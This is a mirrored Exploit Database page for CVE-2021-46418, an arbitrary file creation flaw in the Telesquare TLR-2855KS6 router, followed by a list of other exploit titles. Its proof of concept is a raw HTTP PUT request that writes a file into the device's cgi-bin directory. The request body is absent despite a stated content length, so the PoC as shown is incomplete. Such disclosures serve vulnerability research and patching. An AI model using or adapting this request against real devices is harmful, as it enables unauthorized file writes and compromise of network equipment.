Telesquare TLR-2855KS6 – Arbitrary File Creation

Exploit Database
13 阅读

作者： Momen Eldawakhly

日期： 2022-04-11
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/50862/

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46418

# Proof of Concept

PUT /cgi-bin/testing_cve.txt HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: nonce=1642692359833588
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

last Exploits
Telesquare TLR-2855KS6 – Arbitrary File Creation的更多信息

zomplog 3.9 – Remote Code Execution (RCE)：
Seagate BlackArmor NAS sg2000-2000.1331 – Cross-Site Request Forgery：
Trendchip HG520 ADSL2+ Wireless Modem – Cross-Site Request Forgery：
FIBARO System Home Center 5.021 – Remote File Include：
Navigate CMS 2.8 – Cross-Site Scripting：
S9Y Serendipity 1.5.5 – ‘serendipity[filter][bp.ALT]’ Cross-Site Scripting：
Sonicwall 8.1.0.2-14sv – ‘viewcert.cgi’ Remote Command Injection (Metasploit)：
Manage Engine ServiceDesk Plus 10.0 – Privilege Escalation：